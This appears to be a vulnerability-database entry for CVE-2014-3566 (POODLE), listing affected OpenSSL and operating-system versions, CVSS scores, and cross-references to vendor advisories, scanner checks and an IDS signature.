ID CVE-2014-3566
Summary The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
References
Vulnerable Configurations
  • Red Hat Enterprise Linux 5
    cpe:2.3:o:redhat:enterprise_linux:5
  • Red Hat Enterprise Linux Desktop Supplementary 6.0 (v. 6)
    cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0
  • Red Hat Enterprise Linux Workstation Supplementary 6.0 (v. 6)
    cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0
  • Red Hat Enterprise Linux Server Supplementary 6.0 (v. 6)
    cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0
  • cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:7.0
    cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:7.0
  • cpe:2.3:o:redhat:enterprise_linux_server_supplementary:7.0
    cpe:2.3:o:redhat:enterprise_linux_server_supplementary:7.0
  • cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:76.0
    cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:76.0
  • Red Hat Enterprise Linux Server Supplementary 5.0
    cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0
  • Red Hat Enterprise Linux Desktop Supplementary 5.0
    cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0
  • RedHat Enterprise Linux Workstation 7.0
    cpe:2.3:o:redhat:enterprise_linux_workstation:7.0
  • Red Hat Enterprise Linux Workstation 6.0
    cpe:2.3:o:redhat:enterprise_linux_workstation:6.0
  • RedHat Enterprise Linux Server 7.0
    cpe:2.3:o:redhat:enterprise_linux_server:7.0
  • Red Hat Enterprise Linux Server 6.0
    cpe:2.3:o:redhat:enterprise_linux_server:6.0
  • RedHat Enterprise Linux Desktop 7.0
    cpe:2.3:o:redhat:enterprise_linux_desktop:7.0
  • Red Hat Enterprise Linux Desktop 6.0
    cpe:2.3:o:redhat:enterprise_linux_desktop:6.0
  • IBM AIX 7.1
    cpe:2.3:o:ibm:aix:7.1
  • IBM AIX 6.1
    cpe:2.3:o:ibm:aix:6.1
  • IBM AIX 5.3
    cpe:2.3:o:ibm:aix:5.3
  • Apple Mac OS X 10.10.1
    cpe:2.3:o:apple:mac_os_x:10.10.1
  • cpe:2.3:o:mageia:mageia:4.0
    cpe:2.3:o:mageia:mageia:4.0
  • cpe:2.3:o:mageia:mageia:3.0
    cpe:2.3:o:mageia:mageia:3.0
  • Novell SUSE Linux Enterprise Desktop 12.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0
  • cpe:2.3:o:novell:suse_linux_enterprise_desktop:10.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:10.0
  • cpe:2.3:o:novell:suse_linux_enterprise_desktop:9.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:9.0
  • cpe:2.3:o:novell:suse_linux_enterprise_desktop:11.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:11.0
  • cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0
    cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0
  • Novell SUSE Linux Enterprise Server 12.0
    cpe:2.3:o:novell:suse_linux_enterprise_server:12.0
  • cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:11.0:sp3
    cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:11.0:sp3
  • Novell Suse Linux Enterprise Server 11.0 Sp3 - Vmware
    cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp3:-:-:-:vmware
  • Novell SUSE Linux Enterprise Server 11.0 Service Pack 3
    cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp3
  • Novell openSUSE 13.1
    cpe:2.3:o:novell:opensuse:13.1
  • Novell openSUSE 12.3
    cpe:2.3:o:novell:opensuse:12.3
  • Fedora 21
    cpe:2.3:o:fedoraproject:fedora:21
  • Fedora 20
    cpe:2.3:o:fedoraproject:fedora:20
  • Fedora 19
    cpe:2.3:o:fedoraproject:fedora:19
  • OpenSSL Project OpenSSL 0.9.8zb
    cpe:2.3:a:openssl:openssl:0.9.8zb
  • OpenSSL Project OpenSSL 0.9.8za
    cpe:2.3:a:openssl:openssl:0.9.8za
  • OpenSSL Project OpenSSL 0.9.8z
    cpe:2.3:a:openssl:openssl:0.9.8z
  • OpenSSL Project OpenSSL 0.9.8y
    cpe:2.3:a:openssl:openssl:0.9.8y
  • OpenSSL Project OpenSSL 0.9.8x
    cpe:2.3:a:openssl:openssl:0.9.8x
  • OpenSSL Project OpenSSL 0.9.8w
    cpe:2.3:a:openssl:openssl:0.9.8w
  • OpenSSL Project OpenSSL 0.9.8v
    cpe:2.3:a:openssl:openssl:0.9.8v
  • OpenSSL Project OpenSSL 0.9.8u
    cpe:2.3:a:openssl:openssl:0.9.8u
  • OpenSSL Project OpenSSL 0.9.8t
    cpe:2.3:a:openssl:openssl:0.9.8t
  • OpenSSL Project OpenSSL 0.9.8s
    cpe:2.3:a:openssl:openssl:0.9.8s
  • OpenSSL Project OpenSSL 0.9.8r
    cpe:2.3:a:openssl:openssl:0.9.8r
  • OpenSSL Project OpenSSL 0.9.8q
    cpe:2.3:a:openssl:openssl:0.9.8q
  • OpenSSL Project OpenSSL 0.9.8p
    cpe:2.3:a:openssl:openssl:0.9.8p
  • OpenSSL Project OpenSSL 0.9.8o
    cpe:2.3:a:openssl:openssl:0.9.8o
  • OpenSSL Project OpenSSL 0.9.8n
    cpe:2.3:a:openssl:openssl:0.9.8n
  • OpenSSL Project OpenSSL 0.9.8m Beta1
    cpe:2.3:a:openssl:openssl:0.9.8m:beta1
  • OpenSSL Project OpenSSL 0.9.8m
    cpe:2.3:a:openssl:openssl:0.9.8m
  • OpenSSL Project OpenSSL 0.9.8l
    cpe:2.3:a:openssl:openssl:0.9.8l
  • OpenSSL Project OpenSSL 0.9.8k
    cpe:2.3:a:openssl:openssl:0.9.8k
  • OpenSSL Project OpenSSL 0.9.8j
    cpe:2.3:a:openssl:openssl:0.9.8j
  • OpenSSL Project OpenSSL 0.9.8i
    cpe:2.3:a:openssl:openssl:0.9.8i
  • OpenSSL Project OpenSSL 0.9.8h
    cpe:2.3:a:openssl:openssl:0.9.8h
  • OpenSSL Project OpenSSL 0.9.8g
    cpe:2.3:a:openssl:openssl:0.9.8g
  • OpenSSL Project OpenSSL 0.9.8f
    cpe:2.3:a:openssl:openssl:0.9.8f
  • OpenSSL Project OpenSSL 0.9.8e
    cpe:2.3:a:openssl:openssl:0.9.8e
  • OpenSSL Project OpenSSL 0.9.8d
    cpe:2.3:a:openssl:openssl:0.9.8d
  • OpenSSL Project OpenSSL 0.9.8c
    cpe:2.3:a:openssl:openssl:0.9.8c
  • OpenSSL Project OpenSSL 0.9.8b
    cpe:2.3:a:openssl:openssl:0.9.8b
  • OpenSSL Project OpenSSL 0.9.8a
    cpe:2.3:a:openssl:openssl:0.9.8a
  • OpenSSL Project OpenSSL 0.9.8
    cpe:2.3:a:openssl:openssl:0.9.8
  • OpenSSL Project OpenSSL 1.0.0n
    cpe:2.3:a:openssl:openssl:1.0.0n
  • OpenSSL Project OpenSSL 1.0.0m
    cpe:2.3:a:openssl:openssl:1.0.0m
  • OpenSSL Project OpenSSL 1.0.0l
    cpe:2.3:a:openssl:openssl:1.0.0l
  • OpenSSL Project OpenSSL 1.0.0k
    cpe:2.3:a:openssl:openssl:1.0.0k
  • OpenSSL Project OpenSSL 1.0.0j
    cpe:2.3:a:openssl:openssl:1.0.0j
  • OpenSSL Project OpenSSL 1.0.0i
    cpe:2.3:a:openssl:openssl:1.0.0i
  • OpenSSL Project OpenSSL 1.0.0h
    cpe:2.3:a:openssl:openssl:1.0.0h
  • OpenSSL Project OpenSSL 1.0.0g
    cpe:2.3:a:openssl:openssl:1.0.0g
  • OpenSSL Project OpenSSL 1.0.0f
    cpe:2.3:a:openssl:openssl:1.0.0f
  • OpenSSL Project OpenSSL 1.0.0e
    cpe:2.3:a:openssl:openssl:1.0.0e
  • OpenSSL Project OpenSSL 1.0.0d
    cpe:2.3:a:openssl:openssl:1.0.0d
  • OpenSSL Project OpenSSL 1.0.0c
    cpe:2.3:a:openssl:openssl:1.0.0c
  • OpenSSL Project OpenSSL 1.0.0b
    cpe:2.3:a:openssl:openssl:1.0.0b
  • OpenSSL Project OpenSSL 1.0.0a
    cpe:2.3:a:openssl:openssl:1.0.0a
  • OpenSSL Project OpenSSL 1.0.0 Beta5
    cpe:2.3:a:openssl:openssl:1.0.0:beta5
  • OpenSSL Project OpenSSL 1.0.0 Beta4
    cpe:2.3:a:openssl:openssl:1.0.0:beta4
  • OpenSSL Project OpenSSL 1.0.0 Beta3
    cpe:2.3:a:openssl:openssl:1.0.0:beta3
  • OpenSSL Project OpenSSL 1.0.0 Beta2
    cpe:2.3:a:openssl:openssl:1.0.0:beta2
  • OpenSSL Project OpenSSL 1.0.0 Beta1
    cpe:2.3:a:openssl:openssl:1.0.0:beta1
  • OpenSSL Project OpenSSL 1.0.0
    cpe:2.3:a:openssl:openssl:1.0.0
  • OpenSSL Project OpenSSL 1.0.1h
    cpe:2.3:a:openssl:openssl:1.0.1h
  • OpenSSL Project OpenSSL 1.0.1g
    cpe:2.3:a:openssl:openssl:1.0.1g
  • OpenSSL Project OpenSSL 1.0.1f
    cpe:2.3:a:openssl:openssl:1.0.1f
  • OpenSSL Project OpenSSL 1.0.1e
    cpe:2.3:a:openssl:openssl:1.0.1e
  • OpenSSL Project OpenSSL 1.0.1d
    cpe:2.3:a:openssl:openssl:1.0.1d
  • OpenSSL Project OpenSSL 1.0.1c
    cpe:2.3:a:openssl:openssl:1.0.1c
  • OpenSSL Project OpenSSL 1.0.1b
    cpe:2.3:a:openssl:openssl:1.0.1b
  • OpenSSL Project OpenSSL 1.0.1a
    cpe:2.3:a:openssl:openssl:1.0.1a
  • OpenSSL Project OpenSSL 1.0.1 Beta3
    cpe:2.3:a:openssl:openssl:1.0.1:beta3
  • OpenSSL Project OpenSSL 1.0.1 Beta2
    cpe:2.3:a:openssl:openssl:1.0.1:beta2
  • OpenSSL Project OpenSSL 1.0.1 Beta1
    cpe:2.3:a:openssl:openssl:1.0.1:beta1
  • OpenSSL Project OpenSSL 1.0.1
    cpe:2.3:a:openssl:openssl:1.0.1
  • OpenSSL Project OpenSSL 1.0.1i
    cpe:2.3:a:openssl:openssl:1.0.1i
  • IBM Virtual I/O Server (VIOS) 2.2.3.4
    cpe:2.3:o:ibm:vios:2.2.3.4
  • IBM VIOS 2.2.3.3
    cpe:2.3:o:ibm:vios:2.2.3.3
  • IBM VIOS 2.2.3.2
    cpe:2.3:o:ibm:vios:2.2.3.2
  • IBM Virtual I/O Server (VIOS) 2.2.3.1
    cpe:2.3:o:ibm:vios:2.2.3.1
  • IBM VIOS 2.2.3.0
    cpe:2.3:o:ibm:vios:2.2.3.0
  • IBM VIOS 2.2.2.5
    cpe:2.3:o:ibm:vios:2.2.2.5
  • IBM VIOS 2.2.2.4
    cpe:2.3:o:ibm:vios:2.2.2.4
  • IBM Virtual I/O Server (VIOS) 2.2.2.3
    cpe:2.3:o:ibm:vios:2.2.2.3
  • IBM Virtual I/O Server (VIOS) 2.2.2.2
    cpe:2.3:o:ibm:vios:2.2.2.2
  • IBM Virtual I/O Server (VIOS) 2.2.2.1
    cpe:2.3:o:ibm:vios:2.2.2.1
  • IBM VIOS 2.2.2.0
    cpe:2.3:o:ibm:vios:2.2.2.0
  • IBM VIOS 2.2.1.9
    cpe:2.3:o:ibm:vios:2.2.1.9
  • IBM VIOS 2.2.1.8
    cpe:2.3:o:ibm:vios:2.2.1.8
  • IBM Virtual I/O Server (VIOS) 2.2.1.7
    cpe:2.3:o:ibm:vios:2.2.1.7
  • IBM Virtual I/O Server (VIOS) 2.2.1.6
    cpe:2.3:o:ibm:vios:2.2.1.6
  • IBM Virtual I/O Server (VIOS) 2.2.1.5
    cpe:2.3:o:ibm:vios:2.2.1.5
  • IBM VIOS 2.2.1.4
    cpe:2.3:o:ibm:vios:2.2.1.4
  • IBM VIOS 2.2.1.3
    cpe:2.3:o:ibm:vios:2.2.1.3
  • IBM VIOS 2.2.1.1
    cpe:2.3:o:ibm:vios:2.2.1.1
  • IBM VIOS 2.2.1.0
    cpe:2.3:o:ibm:vios:2.2.1.0
  • IBM VIOS 2.2.0.13
    cpe:2.3:o:ibm:vios:2.2.0.13
  • IBM VIOS 2.2.0.12
    cpe:2.3:o:ibm:vios:2.2.0.12
  • IBM VIOS 2.2.0.11
    cpe:2.3:o:ibm:vios:2.2.0.11
  • IBM VIOS 2.2.0.10
    cpe:2.3:o:ibm:vios:2.2.0.10
  • NetBSD 6.1.5
    cpe:2.3:o:netbsd:netbsd:6.1.5
  • NetBSD 6.1.4
    cpe:2.3:o:netbsd:netbsd:6.1.4
  • NetBSD 6.1.3
    cpe:2.3:o:netbsd:netbsd:6.1.3
  • NetBSD 6.1.2
    cpe:2.3:o:netbsd:netbsd:6.1.2
  • NetBSD 6.1.1
    cpe:2.3:o:netbsd:netbsd:6.1.1
  • NetBSD 6.1
    cpe:2.3:o:netbsd:netbsd:6.1
  • NetBSD 6.0.6
    cpe:2.3:o:netbsd:netbsd:6.0.6
  • NetBSD 6.0.5
    cpe:2.3:o:netbsd:netbsd:6.0.5
  • NetBSD 6.0.4
    cpe:2.3:o:netbsd:netbsd:6.0.4
  • NetBSD 6.0.3
    cpe:2.3:o:netbsd:netbsd:6.0.3
  • NetBSD 6.0.2
    cpe:2.3:o:netbsd:netbsd:6.0.2
  • NetBSD 6.0.1
    cpe:2.3:o:netbsd:netbsd:6.0.1
  • NetBSD 6.0 Beta
    cpe:2.3:o:netbsd:netbsd:6.0:beta
  • NetBSD 6.0
    cpe:2.3:o:netbsd:netbsd:6.0
  • NetBSD 5.1.4
    cpe:2.3:o:netbsd:netbsd:5.1.4
  • NetBSD 5.1.3
    cpe:2.3:o:netbsd:netbsd:5.1.3
  • NetBSD 5.1.2
    cpe:2.3:o:netbsd:netbsd:5.1.2
  • NetBSD 5.1.1
    cpe:2.3:o:netbsd:netbsd:5.1.1
  • NetBSD 5.1
    cpe:2.3:o:netbsd:netbsd:5.1
  • NetBSD 5.2.2
    cpe:2.3:o:netbsd:netbsd:5.2.2
  • NetBSD 5.2.1
    cpe:2.3:o:netbsd:netbsd:5.2.1
  • NetBSD 5.2
    cpe:2.3:o:netbsd:netbsd:5.2
  • Debian Linux 8.0 (Jessie)
    cpe:2.3:o:debian:debian_linux:8.0
  • Debian Linux 7.0
    cpe:2.3:o:debian:debian_linux:7.0
CVSS
Base: 4.3 (as of 15-10-2014 - 18:51)
Impact: 2.9
Exploitability:8.6
CWE CWE-310
CAPEC
  • Signature Spoofing by Key Recreation
    ["An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker."]
Access
VectorComplexityAuthentication
NETWORK MEDIUM NONE
Impact
ConfidentialityIntegrityAvailability
PARTIAL NONE NONE
Bid vFeed
bidid 70574
Certvn vFeed
certvuid VU#577193
certvulink http://www.kb.cert.org/vuls/id/577193
Cisco vFeed
ciscoid cisco-sa-20141014
Debian vFeed
debianid DSA-3253
Fedora vFeed
fedoraid FEDORA-2014-13069
Gentoo vFeed
gentooid GLSA-201606-11
Hp vFeed
hpid HPSBGN03569
hplink http://marc.info/?l=bugtraq&m=145983526810210&w=2
Mandriva vFeed
mandrivaid MDVSA-2015:062
Msf vFeed
msf_script_file metasploit-framework/modules/auxiliary/scanner/http/ssl_version.rb
msf_script_name HTTP SSL/TLS Version Detection (POODLE scanner)
msfid ssl_version.rb
Nessus vFeed
nessus_script_family AIX Local Security Checks
nessus_script_file aix_IV73417.nasl
nessus_script_id 84269
nessus_script_name AIX 6.1 TL 9 : nettcp (IV73417) (POODLE)
Nmap vFeed
nmap_script_cat "discovery", "intrusive"
nmap_script_id ssl-enum-ciphers.nse
Openvas vFeed
openvas_script_family Fedora Local Security Checks
openvas_script_file gb_fedora_2014_15411_libuv_fc21.nasl
openvas_script_id 841059
openvas_script_name Fedora Update for libuv FEDORA-2014-15411
Oval vFeed
cpeid
ovalclass patch
ovalid oval:org.mitre.oval:def:28230
ovaltitle SUSE-SU-2014:1447-1 -- Security update for openwsman (moderate)
Redhat vFeed
redhatid RHSA-2015:0086
redhatovalid oval:com.redhat.rhsa:def:20150086
redhatupdatedesc RHSA-2015:0086: java-1.6.0-sun security update (Important)
Scip vFeed
scipid 67791
sciplink http://www.scip.ch/en/?vuldb.67791
Suricata vFeed
suricata_classtype attempted-recon
suricata_id sid:2019418
suricata_sig ET CURRENT_EVENTS SSL excessive fatal alerts (possible POODLE attack against server)
Suse vFeed
suseid openSUSE-SU-2015:0190
Ubuntu vFeed
ubuntuid USN-2487-1
Vmware vFeed
vmwareid VMSA-2015-0003
Redhat_Bugzilla vFeed
advisory_dateissue 2015-01-26
bugzillaid 1184277
bugzillatitle CVE-2015-0406 Oracle JDK: unspecified vulnerability fixed in 6u91, 7u75 and 8u31 (Deployment)
redhatid RHSA-2015:0086
Last major update 17-03-2015 - 02:00
Published 15-10-2014 - 00:55
Last modified 24-03-2017 - 01:59
Back to Top